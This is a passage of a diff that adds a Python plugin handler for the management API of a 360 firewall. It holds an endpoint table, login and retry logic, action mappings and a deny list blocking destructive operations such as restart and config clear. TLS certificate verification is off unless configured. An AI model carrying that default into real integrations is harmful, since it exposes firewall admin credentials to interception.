-if __name__ == "__main__":
-    main()
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw.handler.py b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw.handler.py
new file mode 100644
index 000000000..14678b2df
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw.handler.py
@@ -0,0 +1,1149 @@
+from __future__ import annotations
+
+import asyncio
+import json
+import os
+import urllib.parse
+from typing import Any, Callable, Optional
+
+import requests
+
+from flocks.config.config_writer import ConfigWriter
+from flocks.security import get_secret_manager
+from flocks.tool.registry import ToolContext, ToolResult
+
+
+SERVICE_ID = "360_fw"
+STORAGE_KEY = "360_fw_v5_5"
+PRODUCT_VERSION = "5.5"
+FW_SOFTWARE_VERSION = "V5.5"
+FW_BUILD_VERSION = "V5.5R605P000B20240625"
+
+
+class FwApiError(RuntimeError):
+    pass
+
+
+class RuntimeConfig:
+    def __init__(
+        self,
+        *,
+        base_url: str,
+        username: str,
+        password: str,
+        verify_ssl: bool,
+        timeout: int,
+    ) -> None:
+        self.base_url = base_url
+        self.username = username
+        self.password = password
+        self.verify_ssl = verify_ssl
+        self.timeout = timeout
+
+
+ActionBuilder = Callable[[dict[str, Any]], Any]
+ActionSpec = tuple[str, str, Optional[ActionBuilder]]
+
+
+def _methods(*values: str) -> list[str]:
+    return list(values)
+
+
+DOCUMENTED_API_METHODS: dict[str, list[str]] = {
+    "/login": _methods("POST"),
+    "/sys_info": _methods("GET"),
+    "/addressobj": _methods("GET", "POST", "PUT", "DELETE"),
+    "/addressgroup": _methods("GET", "POST", "PUT", "DELETE"),
+    "/serviceobj": _methods("GET", "POST", "PUT", "DELETE"),
+    "/servicegroup": _methods("GET", "POST", "PUT", "DELETE"),
+    "/predefined_service": _methods("GET"),
+    "/dom_obj": _methods("GET", "POST", "DELETE"),
+    "/dns_custom": _methods("GET", "POST", "PUT", "DELETE"),
+    "/dns_group": _methods("GET", "POST", "PUT", "DELETE"),
+    "/timeabsobj": _methods("GET", "POST", "DELETE"),
+    "/timecycobj": _methods("GET", "POST", "PUT", "DELETE"),
+    "/fwpolicy": _methods("GET", "POST", "PUT", "DELETE"),
+    "/fwpolicy_state": _methods("PUT"),
+    "/fwpolicy_move": _methods("PUT"),
+    "/policy_group": _methods("GET", "POST", "DELETE"),
+    "/app_policy": _methods("GET", "POST", "DELETE"),
+    "/web_policy": _methods("GET", "POST", "DELETE"),
+    "/interface": _methods("GET"),
+    "/vlan": _methods("GET", "POST", "PUT", "DELETE"),
+    "/vxlan": _methods("GET"),
+    "/static_route": _methods("GET", "POST", "DELETE"),
+    "/healthcheck_list": _methods("GET", "POST", "PUT", "DELETE"),
+    "/link_health_check": _methods("GET", "POST", "PUT", "DELETE"),
+    "/policy_route": _methods("GET", "POST", "DELETE"),
+    "/sdwan_policy": _methods("GET", "POST", "DELETE"),
+    "/sdwan_status": _methods("GET"),
+    "/woc_policy_state": _methods("GET"),
+    "/qos_line": _methods("GET", "POST", "PUT", "DELETE"),
+    "/qos_policy": _methods("GET", "POST", "DELETE"),
+    "/policy_qos_line": _methods("GET"),
+    "/monitor_qos_policy": _methods("GET"),
+    "/security_region": _methods("GET"),
+    "/nat_pool": _methods("GET", "POST", "DELETE"),
+    "/nat_rule_src": _methods("GET"),
+    "/nat_rule_dst": _methods("GET"),
+    "/nat_rule_static": _methods("GET"),
+    "/autoike": _methods("GET", "POST", "DELETE"),
+    "/phase2ike": _methods("POST", "DELETE"),
+    "/ipsec_policy": _methods("GET", "POST", "DELETE"),
+    "/ikesa": _methods("GET"),
+    "/ipsecsa": _methods("GET"),
+    "/tunnel_status_table": _methods("GET"),
+    "/tunnel_status_line": _methods("GET"),
+    "/tunnel_monitor": _methods("POST", "DELETE"),
+    "/gre": _methods("GET", "POST", "PUT", "DELETE"),
+    "/bgp_info": _methods("GET", "POST", "DELETE"),
+    "/bgp_network": _methods("GET", "POST", "DELETE"),
+    "/bgp_peer_group": _methods("GET", "POST", "DELETE"),
+    "/bgp_neighbors": _methods("GET", "POST", "DELETE"),
+    "/bgp_access_list": _methods("GET", "POST", "DELETE"),
+    "/bgp_filter_list": _methods("GET", "POST", "DELETE"),
+    "/bgp_route_map": _methods("GET", "POST", "DELETE"),
+    "/bgp_map_list": _methods("GET", "POST", "DELETE"),
+    "/bgp_prefix_list": _methods("GET", "POST", "DELETE"),
+    "/bgp_prefix_policy": _methods("GET", "POST", "DELETE"),
+    "/bgp_import_check": _methods("PUT"),
+    "/bgp_reflector_switch": _methods("PUT"),
+    "/bgp_timer": _methods("PUT"),
+    "/bgp_route_reflector": _methods("GET", "POST", "DELETE"),
+    "/app_obj": _methods("GET", "POST", "PUT", "DELETE"),
+    "/app_group": _methods("GET", "POST", "DELETE"),
+    "/getAppList": _methods("GET"),
+    "/getAppDetail": _methods("GET"),
+    "/user": _methods("GET", "POST", "DELETE"),
+    "/user_group": _methods("GET", "POST", "PUT", "DELETE"),
+    "/user_obj": _methods("GET"),
+    "/radius": _methods("GET", "POST", "PUT", "DELETE"),
+    "/ldap": _methods("GET", "POST", "DELETE"),
+    "/black_list": _methods("GET", "POST", "DELETE"),
+    "/white_list": _methods("GET", "POST", "DELETE"),
+    "/blackList_group": _methods("GET", "POST", "DELETE"),
+    "/blackListGroup_rename": _methods("PUT"),
+    "/domainBlackList": _methods("GET"),
+    "/domain_blacklist_export": _methods("GET"),
+    "/multiple_ids": _methods("POST", "DELETE"),
+    "/multiple_domains": _methods("POST", "DELETE"),
+    "/protect_policy": _methods("GET", "POST", "DELETE"),
+    "/protect_policy_enable": _methods("PUT"),
+    "/vsys": _methods("POST", "PUT", "DELETE"),
+    "/xml_av_profile": _methods("GET", "POST", "PUT", "DELETE"),
+    "/signature_set": _methods("GET", "POST", "PUT", "DELETE"),
+    "/cpu_state": _methods("GET"),
+    "/memory_state": _methods("GET"),
+    "/device_state": _methods("GET"),
+    "/device_link_state": _methods("GET"),
+    "/interface_flow_state": _methods("GET"),
+    "/interface_flow_bar_state": _methods("GET"),
+    "/user_flow_state": _methods("GET"),
+    "/user_flow_bar_state": _methods("GET"),
+    "/monitor_user": _methods("GET"),
+    "/app_flow_state": _methods("GET"),
+    "/app_flow_bar_state": _methods("GET"),
+    "/url_state": _methods("GET"),
+    "/url_bar_state": _methods("GET"),
+    "/threaten_state": _methods("GET"),
+    "/threaten_bar_state": _methods("GET"),
+    "/interface_monitor": _methods("GET"),
+    "/vxlan_monitor": _methods("GET"),
+    "/lte_config": _methods("GET"),
+    "/loopback": _methods("GET"),
+    "/ha_config": _methods("GET"),
+    "/ha_config_syn": _methods("GET"),
+    "/ha_status_all": _methods("GET"),
+    "/lte_info": _methods("GET"),
+    "/ntp_config": _methods("GET"),
+    "/v0.0.1/ntp_config": _methods("GET"),
+    "/ntp_key": _methods("GET"),
+    "/syslog_server": _methods("GET"),
+    "/v0.0.1/syslog_server": _methods("GET", "POST", "DELETE"),
+    "/logFilter": _methods("GET"),
+    "/fw_policy_config": _methods("GET"),
+    "/license_config": _methods("GET"),
+    "/virtual_route_list": _methods("GET"),
+    "/diagnose": _methods("GET"),
+}
+
+BLOCKED_HIGH_RISK_MUTATIONS: dict[str, set[str]] = {
+    "/save_config": {"GET", "POST", "PUT", "DELETE"},
+    "/change_password": {"GET", "POST", "PUT", "DELETE"},
+    "/config_clear_common": {"GET", "POST", "PUT", "DELETE"},
+    "/config_clear_interface": {"GET", "POST", "PUT", "DELETE"},
+    "/restart": {"GET", "POST", "PUT", "DELETE"},
+    "/restore": {"GET", "POST", "PUT", "DELETE"},
+    "/library_upgrade": {"GET", "POST", "PUT", "DELETE"},
+    "/software_update_now": {"GET", "POST", "PUT", "DELETE"},
+    "/software_update_ontime": {"POST", "PUT", "DELETE"},
+    "/system_upgrade": {"GET", "POST", "PUT", "DELETE"},
+    "/license_config": {"POST", "PUT", "DELETE"},
+    "/ha_config": {"POST", "PUT", "DELETE"},
+    "/fw_policy_config": {"POST", "PUT", "DELETE"},
+    "/global_domain_block_switch": {"PUT", "POST", "DELETE"},
+    "/clearBalckDomainBingo": {"GET", "POST", "PUT", "DELETE"},
+    "/domain_blacklist_import": {"GET", "POST", "PUT", "DELETE"},
+    "/session_monitor": {"DELETE"},
+    "/ispList": {"GET", "POST", "PUT", "DELETE"},
+    "/isp_restore": {"GET", "POST", "PUT", "DELETE"},
+    "/policy_group_move": {"GET", "POST", "PUT", "DELETE"},
+    "/nat_rule_src_move": {"GET", "POST", "PUT", "DELETE"},
+    "/nat_rule_dst_move": {"GET", "POST", "PUT", "DELETE"},
+    "/nat_rule_static_move": {"GET", "POST", "PUT", "DELETE"},
+    "/policy_route_move": {"GET", "POST", "PUT", "DELETE"},
+    "/policy_route_state": {"GET", "POST", "PUT", "DELETE"},
+    "/qos_policy_move": {"GET", "POST", "PUT", "DELETE"},
+    "/sdwan_policy_move": {"GET", "POST", "PUT", "DELETE"},
+    "/bgp_clear_bgp_route": {"GET", "POST", "PUT", "DELETE"},
+    "/user_obj": {"POST", "PUT", "DELETE"},
+    "/signature_event": {"POST", "PUT", "DELETE"},
+}
+
+KNOWN_PROBLEM_RESOURCES: dict[str, dict[str, dict[str, Any]]] = {
+    "/domainBlackList": {"GET": {"http_status": 404, "code": 404, "message": "404 Not Found"}},
+    "/global_domain_block_switch": {"GET": {"http_status": 404, "code": 404, "message": "404 Not Found"}},
+    "/domain_blacklist_export": {"GET": {"http_status": 404, "code": 404, "message": "404 Not Found"}},
+    "/radius": {"PUT": {"http_status": 400, "code": 103, "message": "输入的内容长度超过限制"}},
+    "/multiple_ids": {"POST": {"http_status": 400, "code": 1111, "message": "不支持的csp联动协议"}},
+    "/protect_policy": {"POST": {"http_status": 400, "code": 121, "message": "策略数量已达到最大限制"}},
+    "/protect_policy_enable": {"PUT": {"http_status": 400, "code": 87, "message": "目标策略不存在"}},
+    "/vsys": {
+        "POST": {"http_status": 400, "code": 1087, "message": "虚拟路由器或虚拟系统不存在"},
+        "PUT": {"http_status": 400, "code": 1087, "message": "虚拟路由器或虚拟系统不存在"},
+    },
+    "/bgp_route_reflector": {"POST": {"http_status": 400, "code": 484, "message": "对等体标志设置错误"}},
+}
+
+
+def _resolve_ref(value: Any) -> str:
+    if value is None:
+        return ""
+    if not isinstance(value, str):
+        return str(value)
+    if value.startswith("{secret:") and value.endswith("}"):
+        return get_secret_manager().get(value[len("{secret:") : -1]) or ""
+    if value.startswith("{env:") and value.endswith("}"):
+        return os.getenv(value[len("{env:") : -1], "")
+    return value
+
+
+def _raw_service_config() -> dict[str, Any]:
+    raw = ConfigWriter.get_api_service_raw(SERVICE_ID)
+    if not isinstance(raw, dict):
+        raw = ConfigWriter.get_api_service_raw(STORAGE_KEY)
+    return raw if isinstance(raw, dict) else {}
+
+
+def _as_bool(value: Any, default: bool) -> bool:
+    if value is None:
+        return default
+    if isinstance(value, bool):
+        return value
+    if isinstance(value, str):
+        text = value.strip().lower()
+        if text in {"1", "true", "yes", "on"}:
+            return True
+        if text in {"0", "false", "no", "off"}:
+            return False
+    return bool(value)
+
+
+def _config_value(raw: dict[str, Any], *keys: str) -> Any:
+    for key in keys:
+        if raw.get(key) is not None:
+            return raw[key]
+    custom_settings = raw.get("custom_settings")
+    if isinstance(custom_settings, dict):
+        for key in keys:
+            if custom_settings.get(key) is not None:
+                return custom_settings[key]
+    return None
+
+
+def _resolve_verify_ssl(raw: dict[str, Any]) -> bool:
+    value = _config_value(raw, "verify_ssl", "ssl_verify")
+    if value is None:
+        value = os.getenv("FW_VERIFY_SSL")
+    return _as_bool(value, False)
+
+
+def _normalize_base_url(value: str) -> str:
+    base_url = value.rstrip("/")
+    if not base_url:
+        return ""
+    if not base_url.endswith("/API"):
+        base_url = base_url + "/API"
+    return base_url
+
+
+def _load_runtime_config() -> RuntimeConfig:
+    raw = _raw_service_config()
+    sm = get_secret_manager()
+
+    base_url = _normalize_base_url(
+        _resolve_ref(raw.get("base_url"))
+        or _resolve_ref(raw.get("baseUrl"))
+        or os.getenv("FW_BASE_URL", "")
+    )
+    username = (
+        _resolve_ref(raw.get("username"))
+        or sm.get("360_fw_v5_5_username")
+        or sm.get("360_fw_username")
+        or os.getenv("FW_USERNAME", "")
+        or os.getenv("FW_USER", "")
+    )
+    password = (
+        _resolve_ref(raw.get("password"))
+        or sm.get("360_fw_v5_5_password")
+        or sm.get("360_fw_password")
+        or os.getenv("FW_PASSWORD", "")
+        or os.getenv("FW_PASS", "")
+    )
+    timeout_value = raw.get("timeout") or os.getenv("FW_TIMEOUT") or 30
+    try:
+        timeout = int(timeout_value)
+    except (TypeError, ValueError):
+        timeout = 30
+
+    if not base_url:
+        raise FwApiError("360 FW base_url is required")
+    if not username:
+        raise FwApiError("360 FW username is required")
+    if not password:
+        raise FwApiError("360 FW password is required")
+
+    return RuntimeConfig(
+        base_url=base_url,
+        username=username,
+        password=password,
+        verify_ssl=_resolve_verify_ssl(raw),
+        timeout=timeout,
+    )
+
+
+class FwClient:
+    def __init__(self, config: RuntimeConfig) -> None:
+        self.config = config
+        self.base_url = config.base_url
+        self.username = config.username
+        self.password = config.password
+        self.verify_ssl = config.verify_ssl
+        self.timeout = config.timeout
+        self.session = requests.Session()
+        self.session.verify = self.verify_ssl
+        self.authorization: Optional[str] = None
+
+    def login(self) -> dict[str, Any]:
+        resp = self.session.request(
+            "POST",
+            f"{self.base_url}/login",
+            json={"user": self.username, "pwd": self.password},
+            timeout=self.timeout,
+        )
+        data = self._parse_response(resp, "POST", "/login")
+        token = data.get("authorization") if isinstance(data, dict) else None
+        if resp.status_code != 200 or data.get("result") is not True or not token:
+            raise FwApiError(f"login failed: HTTP {resp.status_code}, {self._short(data)}")
+        self.authorization = str(token)
+        self.session.headers.update({"Authorization": self.authorization, "Content-Type": "application/json"})
+        return self._redact_auth(data)
+
+    def get(
+        self,
+        path: str,
+        query: Optional[dict[str, Any]] = None,
+        retry: bool = True,
+    ) -> dict[str, Any]:
+        if not self.authorization:
+            self.login()
+        return self._request_with_retry("GET", path, query=query, body=None, retry=retry)
+
+    def request(
+        self,
+        method: str,
+        path: str,
+        query: Optional[dict[str, Any]] = None,
+        body: Optional[Any] = None,
+        retry: bool = True,
+    ) -> dict[str, Any]:
+        method = method.upper()
+        if method == "GET":
+            return self.get(path, query=query, retry=retry)
+        if method not in {"POST", "PUT", "DELETE"}:
+            raise FwApiError("method must be GET, POST, PUT, or DELETE")
+        if not self.authorization:
+            self.login()
+        return self._request_with_retry(method, path, query=query, body=body, retry=retry)
+
+    def _request_with_retry(
+        self,
+        method: str,
+        path: str,
+        *,
+        query: Optional[dict[str, Any]],
+        body: Optional[Any],
+        retry: bool,
+    ) -> dict[str, Any]:
+        try:
+            data = self._raw_request(method, path, query=query, body=body)
+        except (requests.RequestException, FwApiError):
+            if not retry:
+                raise
+            self.login()
+            data = self._raw_request(method, path, query=query, body=body)
+        if self._is_auth_error(data) and retry:
+            self.login()
+            data = self._raw_request(method, path, query=query, body=body)
+        return data
+
+    def _raw_request(
+        self,
+        method: str,
+        path: str,
+        *,
+        query: Optional[dict[str, Any]],
+        body: Optional[Any],
+    ) -> dict[str, Any]:
+        request_path = build_path(path, query)
+        resp = self.session.request(
+            method,
+            f"{self.base_url}{request_path}",
+            json=body,
+            timeout=self.timeout,
+        )
+        data = self._parse_response(resp, method, request_path)
+        if resp.status_code < 200 or resp.status_code >= 300:
+            raise FwApiError(f"HTTP {resp.status_code} from {method} {request_path}: {self._short(data)}")
+        return data
+
+    @staticmethod
+    def _parse_response(resp: requests.Response, method: str, path: str) -> dict[str, Any]:
+        text = resp.text or ""
+        if not text.strip():
+            return {"result": True, "data": None}
+        try:
+            data = resp.json()
+        except Exception as exc:
+            raise FwApiError(f"non-json response from {method} {path}: HTTP {resp.status_code}, {text[:200]}") from exc
+        if not isinstance(data, dict):
+            return {"result": True, "data": data}
+        return data
+
+    @staticmethod
+    def _is_auth_error(data: dict[str, Any]) -> bool:
+        code = data.get("code")
+        msg = str(data.get("message") or data.get("msg") or data.get("error") or "").lower()
+        return code in {401, "401"} or "authorization" in msg or "token" in msg
+
+    @staticmethod
+    def _redact_auth(data: dict[str, Any]) -> dict[str, Any]:
+        output = dict(data)
+        if "authorization" in output:
+            output["authorization"] = "***"
+        return output
+
+    @staticmethod
+    def _short(data: Any) -> str:
+        return json.dumps(data, ensure_ascii=False)[:300]
+
+
+_CLIENTS: dict[tuple[str, str, bool], FwClient] = {}
+
+
+def _client_cache_key(config: RuntimeConfig) -> tuple[str, str, bool]:
+    return (config.base_url, config.username, config.verify_ssl)
+
+
+def get_client() -> FwClient:
+    config = _load_runtime_config()
+    key = _client_cache_key(config)
+    client = _CLIENTS.get(key)
+    if client is None or client.password != config.password:
+        client = FwClient(config)
+        _CLIENTS[key] = client
+    return client
+
+
+def ok(content: Any) -> ToolResult:
+    return ToolResult(
+        success=True,
+        output=content,
+        metadata={
+            "source": "360 FW",
+            "version": PRODUCT_VERSION,
+            "fw_software_version": FW_SOFTWARE_VERSION,
+            "version_software": FW_BUILD_VERSION,
+        },
+    )
+
+
+def api_result(data: dict[str, Any]) -> ToolResult:
+    if data.get("result") is False:
+        raise FwApiError(error_text(data))
+    code = data.get("code")
+    if code not in (None, 0, "0"):
+        raise FwApiError(error_text(data))
+    return ok(data)
+
+
+def error_text(data: dict[str, Any]) -> str:
+    code = data.get("code")
+    msg = data.get("message") or data.get("msg") or data.get("error")
+    if code is not None or msg:
+        return f"code={code} message={msg}"
+    return json.dumps(data, ensure_ascii=False)[:300]
+
+
+def require_int(value: Any, name: str, default: Optional[int] = None) -> int:
+    if value in (None, "") and default is not None:
+        return default
+    try:
+        return int(value)
+    except Exception as exc:
+        raise FwApiError(f"{name} must be an integer") from exc
+
+
+def require_text(value: Any, name: str, default: Optional[str] = None) -> str:
+    if value in (None, "") and default is not None:
+        return default
+    if value in (None, ""):
+        raise FwApiError(f"{name} is required")
+    text = str(value).strip()
+    if not text:
+        raise FwApiError(f"{name} is required")
+    return text
+
+
+def first_present(args: dict[str, Any], *names: str) -> Any:
+    for name in names:
+        value = args.get(name)
+        if value not in (None, ""):
+            return value
+    return None
+
+
+def require_payload(value: Any, name: str = "body") -> Any:
+    if isinstance(value, str):
+        try:
+            value = json.loads(value)
+        except (TypeError, ValueError, json.JSONDecodeError) as exc:
+            raise FwApiError(f"{name} must be valid JSON") from exc
+    if not isinstance(value, (dict, list)):
+        raise FwApiError(f"{name} must be a JSON object or array")
+    return value
+
+
+def optional_payload(value: Any, name: str = "body") -> Any:
+    if value in (None, ""):
+        return None
+    return require_payload(value, name)
+
+
+def payload_or(args: dict[str, Any], builder: ActionBuilder) -> Any:
+    payload = optional_payload(args.get("body"))
+    if payload is not None:
+        return payload
+    return builder(args)
+
+
+def name_body(args: dict[str, Any], key: str = "name") -> dict[str, Any]:
+    return {key: require_text(args.get(key) or args.get("name"), key)}
+
+
+def address_prefix(value: str, obj_type: int) -> str:
+    if value[:2] in {"0:", "1:", "8:"}:
+        return value
+    return f"{obj_type}:{value}"
+
+
+def build_addressobj_body(args: dict[str, Any]) -> dict[str, Any]:
+    obj_type = require_int(args.get("type", 0), "type")
+    addr = require_text(args.get("addr"), "addr")
+    return {
+        "name": require_text(args.get("name"), "name"),
+        "type": obj_type,
+        "desc": str(args.get("desc") or ""),
+        "item": [{"addr": address_prefix(addr, obj_type)}],
+    }
+
+
+def build_serviceobj_body(args: dict[str, Any]) -> dict[str, Any]:
+    return {
+        "name": require_text(args.get("name"), "name"),
+        "desc": str(args.get("desc") or ""),
+        "item": [{"sev_str": require_text(args.get("sev_str"), "sev_str")}],
+    }
+
+
+def build_static_route_body(args: dict[str, Any]) -> dict[str, Any]:
+    return {
+        "ip_vrf_name": str(args.get("ip_vrf_name") or "default"),
+        "dst_ip": require_text(args.get("dst_ip"), "dst_ip"),
+        "nh_type": str(args.get("nh_type") or "0"),
+        "nh_ip": require_text(args.get("nh_ip"), "nh_ip"),
+        "oif": str(args.get("oif") or ""),
+        "weigh": str(args.get("weigh") or "1"),
+        "distance": str(args.get("distance") or "255"),
+        "monitor_name": str(args.get("monitor_name") or ""),
+    }
+
+
+def build_policy_group_body(args: dict[str, Any]) -> dict[str, Any]:
+    return {"name": require_text(args.get("name"), "name"), "protocol": str(args.get("protocol") or "1")}
+
+
+def build_fwpolicy_state_body(args: dict[str, Any]) -> dict[str, Any]:
+    return {
+        "enable": require_int(args.get("enable", 0), "enable"),
+        "id": require_int(args.get("id"), "id"),
+        "protocol": require_int(args.get("protocol", 1), "protocol"),
+    }
+
+
+def build_delete_name_body(args: dict[str, Any]) -> dict[str, Any]:
+    body = name_body(args)
+    if args.get("type") not in (None, ""):
+        body["type"] = require_int(args["type"], "type")
+    if args.get("protocol") not in (None, ""):
+        body["protocol"] = require_int(args["protocol"], "protocol")
+    return body
+
+
+def build_path(path: str, query: Optional[dict[str, Any]] = None) -> str:
+    path = normalize_api_path(path)
+    if query:
+        sep = "&" if "?" in path else "?"
+        path = f"{path}{sep}{urllib.parse.urlencode(query, doseq=True)}"
+    return path
+
+
+def normalize_api_path(path: str) -> str:
+    path = str(path or "").strip()
+    if path.startswith("API/"):
+        path = "/" + path
+    if path.startswith("/API/"):
+        path = path[len("/API") :]
+    if path.startswith("API?"):
+        path = "/" + path
+    if not path.startswith("/"):
+        path = "/" + path
+    if path == "/API":
+        path = "/"
+    if not path or path == "/":
+        raise FwApiError("path is required")
+    return path
+
+
+def resource_of(path: str) -> str:
+    return normalize_api_path(path).split("?", 1)[0]
+
+
+def reject_high_risk_mutation(method: str, path: str) -> None:
+    resource = resource_of(path)
+    methods = BLOCKED_HIGH_RISK_MUTATIONS.get(resource)
+    if methods and method.upper() in methods:
+        raise FwApiError(f"360 FW integration does not support high-risk FW operations: {method.upper()} {resource}")
+
+
+def validate_documented_api(method: str, path: str) -> None:
+    resource = resource_of(path)
+    methods = DOCUMENTED_API_METHODS.get(resource)
+    if methods is None:
+        raise FwApiError(f"{resource} is not listed in the local FW API document")
+    if method.upper() not in methods:
+        raise FwApiError(f"{method.upper()} {resource} is not listed in the local FW API document")
+
+
+def query_from_args(args: dict[str, Any], allowed: list[str]) -> dict[str, Any] | None:
+    query = args.get("query")
+    if query is not None:
+        if not isinstance(query, dict):
+            raise FwApiError("query must be an object")
+        return query
+    output = {key: args[key] for key in allowed if args.get(key) not in (None, "")}
+    return output or None
+
+
+GET_ACTIONS: dict[str, str] = {
+    "fw_system_info_get": "/sys_info",
+    "fw_interface_list": "/interface",
+    "fw_interface_get": "/interface",
+    "fw_ha_config_get": "/ha_config",
+    "fw_ha_config_syn_get": "/ha_config_syn",
+    "fw_ha_status_all_get": "/ha_status_all",
+    "fw_lte_config_get": "/lte_config",
+    "fw_lte_info_get": "/lte_info",
+    "fw_loopback_list": "/loopback",
+    "fw_ntp_config_get": "/ntp_config",
+    "fw_v0_0_1_ntp_config_get": "/v0.0.1/ntp_config",
+    "fw_ntp_key_get": "/ntp_key",
+    "fw_syslog_server_get": "/syslog_server",
+    "fw_v0_0_1_syslog_server_get": "/v0.0.1/syslog_server",
+    "fw_log_filter_get": "/logFilter",
+    "fw_fw_policy_config_get": "/fw_policy_config",
+    "fw_license_config_get": "/license_config",
+    "fw_virtual_route_list": "/virtual_route_list",
+    "fw_diagnose_get": "/diagnose",
+    "fw_addressobj_list": "/addressobj?page=1&length=100&flag=0",
+    "fw_addressobj_get": "/addressobj",
+    "fw_addressgroup_list": "/addressgroup?page=1&length=100&flag=0",
+    "fw_addressgroup_get": "/addressgroup",
+    "fw_serviceobj_list": "/serviceobj?page=1&length=100&flag=0",
+    "fw_serviceobj_get": "/serviceobj",
+    "fw_servicegroup_list": "/servicegroup?page=1&length=100&flag=0",
+    "fw_servicegroup_get": "/servicegroup",
+    "fw_predefined_service_list": "/predefined_service",
+    "fw_dom_obj_list": "/dom_obj",
+    "fw_dns_custom_list": "/dns_custom",
+    "fw_dns_custom_get": "/dns_custom",
+    "fw_dns_group_list": "/dns_group",
+    "fw_dns_group_get": "/dns_group",
+    "fw_timeabsobj_list": "/timeabsobj?flag=0",
+    "fw_timeabsobj_get": "/timeabsobj",
+    "fw_timecycobj_list": "/timecycobj?flag=0",
+    "fw_timecycobj_get": "/timecycobj",
+    "fw_app_obj_list": "/app_obj",
+    "fw_app_obj_get": "/app_obj",
+    "fw_app_group_list": "/app_group",
+    "fw_app_group_get": "/app_group",
+    "fw_get_app_list": "/getAppList",
+    "fw_get_app_detail": "/getAppList",
+    "fw_blackList_group_list": "/blackList_group",
+    "fw_xml_av_profile_list": "/xml_av_profile",
+    "fw_signature_set_list": "/signature_set",
+    "fw_fwpolicy_list": "/fwpolicy?protocol=1&page=1&length=100&flag=0",
+    "fw_fwpolicy_get": "/fwpolicy",
+    "fw_policy_group_list": "/policy_group?protocol=1",
+    "fw_app_policy_list": "/app_policy",
+    "fw_web_policy_list": "/web_policy",
+    "fw_black_list_list": "/black_list?page=1",
+    "fw_white_list_list": "/white_list?page=1",
+    "fw_protect_policy_list": "/protect_policy?protocol=1",
+    "fw_vlan_list": "/vlan",
+    "fw_vxlan_list": "/vxlan",
+    "fw_static_route_list": "/static_route?protocol=1&ip_vrf_name=default",
+    "fw_healthcheck_list": "/healthcheck_list",
+    "fw_link_health_check_list": "/link_health_check",
+    "fw_qos_line_list": "/qos_line",
+    "fw_qos_policy_list": "/qos_policy",
+    "fw_nat_pool_list": "/nat_pool",
+    "fw_nat_rule_src_list": "/nat_rule_src?protocol=1",
+    "fw_nat_rule_dst_list": "/nat_rule_dst?protocol=1",
+    "fw_nat_rule_static_list": "/nat_rule_static?protocol=1",
+    "fw_policy_route_list": "/policy_route?protocol_type=1",
+    "fw_sdwan_policy_list": "/sdwan_policy",
+    "fw_sdwan_status_get": "/sdwan_status",
+    "fw_woc_policy_state_get": "/woc_policy_state",
+    "fw_gre_list": "/gre?ip_vrf_name=default",
+    "fw_autoike_list": "/autoike",
+    "fw_ipsec_policy_list": "/ipsec_policy",
+    "fw_ikesa_list": "/ikesa",
+    "fw_ipsecsa_list": "/ipsecsa",
+    "fw_tunnel_status_table": "/tunnel_status_table?page=1&length=10",
+    "fw_tunnel_status_line": "/tunnel_status_line?status_type=1&period=1&page=1&length=10",
+    "fw_bgp_info_get": "/bgp_info?ip_vrf_name=default",
+    "fw_bgp_network_list": "/bgp_network?ip_vrf_name=default",
+    "fw_bgp_peer_group_list": "/bgp_peer_group",
+    "fw_bgp_neighbors_list": "/bgp_neighbors?ip_vrf_name=default",
+    "fw_bgp_access_list_list": "/bgp_access_list",
+    "fw_bgp_filter_list_list": "/bgp_filter_list",
+    "fw_bgp_route_map_list": "/bgp_route_map",
+    "fw_bgp_map_list_list": "/bgp_map_list",
+    "fw_bgp_prefix_list_list": "/bgp_prefix_list",
+    "fw_bgp_prefix_policy_list": "/bgp_prefix_policy",
+    "fw_user_list": "/user?page=1&length=100",
+    "fw_user_group_list": "/user_group?page=1&length=100",
+    "fw_user_obj_list": "/user_obj?page=1&length=100",
+    "fw_radius_list": "/radius",
+    "fw_ldap_list": "/ldap",
+    "fw_cpu_state": "/cpu_state?type=1&period=1",
+    "fw_memory_state": "/memory_state?type=2&period=1",
+    "fw_device_state": "/device_state?type=4&period=1",
+    "fw_device_link_state": "/device_link_state?period=1",
+    "fw_interface_flow_state": "/interface_flow_state?period=1&flow=3&inf_type=1",
+    "fw_interface_flow_bar_state": "/interface_flow_bar_state?period=1&flow=3&inf_type=1",
+    "fw_user_flow_state": "/user_flow_state?period=1&flow=3",
+    "fw_user_flow_bar_state": "/user_flow_bar_state?period=1&flow=3",
+    "fw_monitor_user": "/monitor_user?period=1&user_type=2",
+    "fw_app_flow_state": "/app_flow_state?period=1&flow=3&stat_type=1",
+    "fw_app_flow_bar_state": "/app_flow_bar_state?period=1&flow=3&stat_type=1",
+    "fw_url_state": "/url_state?period=1&stat_type=1",
+    "fw_url_bar_state": "/url_bar_state?period=1&stat_type=1",
+    "fw_threaten_state": "/threaten_state?period=1&stat_type=1",
+    "fw_threaten_bar_state": "/threaten_bar_state?period=1&stat_type=1",
+    "fw_get_app_detail_monitor": "/getAppDetail?period=1&stat_type=2",
+    "fw_interface_monitor": "/interface_monitor",
+    "fw_interface_monitor_vlan": "/interface_monitor?inf_type=2",
+    "fw_qos_monitor": "/monitor_qos_policy",
+    "fw_vxlan_monitor": "/vxlan_monitor?period=1",
+}
+
+ACTION_SPECS: dict[str, ActionSpec] = {
+    "fw_addressobj_create": ("POST", "/addressobj", lambda a: payload_or(a, build_addressobj_body)),
+    "fw_addressobj_update": ("PUT", "/addressobj", lambda a: payload_or(a, build_addressobj_body)),
+    "fw_addressobj_delete": ("DELETE", "/addressobj", lambda a: payload_or(a, lambda x: {"name": require_text(x.get("name"), "name"), "type": require_int(x.get("type", 0), "type")})),
+    "fw_serviceobj_create": ("POST", "/serviceobj", lambda a: payload_or(a, build_serviceobj_body)),
+    "fw_serviceobj_update": ("PUT", "/serviceobj", lambda a: payload_or(a, build_serviceobj_body)),
+    "fw_serviceobj_delete": ("DELETE", "/serviceobj", lambda a: payload_or(a, build_delete_name_body)),
+    "fw_policy_group_create": ("POST", "/policy_group", lambda a: payload_or(a, build_policy_group_body)),
+    "fw_policy_group_delete": ("DELETE", "/policy_group", lambda a: payload_or(a, lambda x: {"name": require_text(x.get("name"), "name"), "protocol": str(x.get("protocol") or "1"), "del_act": str(x.get("del_act") or "0")})),
+    "fw_fwpolicy_state_update": ("PUT", "/fwpolicy_state", lambda a: payload_or(a, build_fwpolicy_state_body)),
+    "fw_static_route_create": ("POST", "/static_route?protocol=1", lambda a: payload_or(a, build_static_route_body)),
